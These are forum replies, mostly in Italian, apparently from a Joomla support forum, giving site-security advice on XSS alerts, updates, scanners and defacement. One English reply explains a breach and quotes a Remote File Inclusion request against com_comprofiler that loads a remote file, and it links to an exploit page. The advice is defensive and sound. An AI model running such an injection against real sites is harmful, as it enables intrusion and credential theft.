Ciao,
prova a mandarmi il report anche se sono quasi sicuro che i risultati sono dei falsi positivi.

Installare l'ultima versione.c

ciao,
per prima cosa devi trovare il "virus", probabilmente sarà qualche riga di javascript, è anche possibile che non ci sia nulla di pericoloso, spesso le protezioni web e av non sono molto precise. Se non trovi nulla puoi provare con un debugger per javascript, c'è un plugin gratuito per ff, inoltre ricordati di cercare anche nel database. Spesso questi "virus" sono dei xss un po elaborati per maggiori info vedi qui:

_http://stacktrace.it/2008/08/xss-depth/

spero ti torni utile. bye

ciao, credo che la risposta sia paradossale, joomla è uno dei cms di maggiore successo quindi ha una visibilità sulla rete superiore ai suoi antagonisti, ciò lo rende più appetibile ad attacchi ma allo stesso tempo lo rende più sicuro, prendi esempio da Mozilla Firefox. Questa discussione appare di tanto in tanto qua e la nella rete e la risposta è sempre la stessa. La sicurezza di un sito non nasce dal cms ma dal webmaster. Esistono parecchi modi per rendere sicuro il tuo sito ma lo strumento più importante sei tu.

ciao,
i test di sicurezza si possono fare mediante programmi che testano le vulnerabilità conosciute, vedi acunetix web vuln scan. oppure, cosa che consiglio è imparare a trovare le vulnerabilità, so che non è facile, soprattutto per quelli alle prime armi, cmq con un po di pratica si riesce a coprire ogni falla.
Per capire come ragiona un hacker devi essere tu stesso come loro.

ciao,
per qualsiasi problema potete contattarmi su msn locutus@uptm.org, così facciamo prima. Cmq in questi giorni preparerò un videotutorial che mostra come applicare lo script. Abbiate pazienza.

PS
pregherei i moderatori di fare uno sticky con questo post.

Ciao,
aggiorna tutto alla versione 1.5.7 poi segui questo post:

http://forum.joomla.it/index.php/topic,50464.0.html

bye

hi,
i think your site is bugged. This type of bugs are called RFI (Remote File Inclusion).
 

/mysitename//index.php?option=com_comprofiler&task=userProfile&user=http://urlcrack.txt

As you can see above the attacker has injected some malicious code into your site through the component "com_comprofiler". I suggest you to purge that component and perform a full check on server files and databases.

Anyway that script doesn't send email. It was used to retrive some info and psw from your server then the hacker has sent the emails using your data.


ps
look at this one:

http://www.milw0rm.com/exploits/5491

bye

non penso, per editare un file nella root del server devi accedere fisicamente al file,mediante un editor o avere la possibilità di caricare/scaricare direttamente i file (RFI)... tramite una sql injection al massimo puoi modificare e/o vedere i valori/stringhe nei database.

dipende mi pare che spesso dopo un deface si consigli agli utenti di ricaricare il file index.php

Perchè i defacers hanno ottenuto la psw di admin quindi hanno accesso al manager e, di conseguenza, all'editor dei file e alla gestione dei moduli. Quindi come già ho affermato, nel caso di joomla, se un defacer ottiene la psw dell'admin ma il sito è protetto con doppio login il risultato è che il defacer non può far molto. Soprattutto perchè la maggiorparte dei defacer sono dei bambini cretini che non sanno nulla di php e databases. (script kiddies)

mmm... non credo sia un'ipotesi plausibile, il defacer o chicchessia, può solo andare a modificare i valori nel db, senza a vere accesso alla root del server. Correggimi se sbaglio.